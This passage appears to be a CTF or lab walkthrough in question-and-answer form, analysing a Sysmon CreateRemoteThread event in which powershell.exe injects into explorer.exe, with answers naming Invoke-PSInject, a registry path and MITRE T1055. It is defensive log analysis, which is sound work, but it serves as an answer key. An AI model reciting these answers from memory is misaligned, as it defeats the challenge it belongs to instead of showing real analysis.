What is the value under Date and Time? (MM/DD/YYYY H:MM:SS [AM/PM])

TimeCreated  : 1/21/2021 5:07:06 PM
ProviderName : Microsoft-Windows-Sysmon
Id           : 8
Message      : CreateRemoteThread detected:
               RuleName: -
               UtcTime: 2021-01-22 01:07:06.182
               SourceProcessGuid: {786593ca-24e9-600a-eb00-000000000300}
               SourceProcessId: 3088
               SourceImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
               TargetProcessGuid: {786593ca-776d-6009-4b00-000000000300}
               TargetProcessId: 2684
               TargetImage: C:\Windows\explorer.exe
               NewThreadId: 4872
               StartAddress: 0x00000000027D0000
               StartModule: -
               StartFunction: -

1/21/2021 5:07:06 PM

What is the first operation listed by the 2nd process starting with the Date and Time from Q25?

# The first operation starts with PID 3088 (the powershell.exe process)
# So filter Procmon on that PID
Thread Create

What is the full registry path that was queried by the attacker to get information about the victim?

# Filter 'Path Contains ReleaseID'
HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ReleaseID

What is the name of the last module in the stack from this event which had a successful result?

<unknown>

Most likely what module within the attack framework was used between the 2 processes?

Invoke-PSInject

What is the MITRE ID for this technique?

https://attack.mitre.org/techniques/T1055/
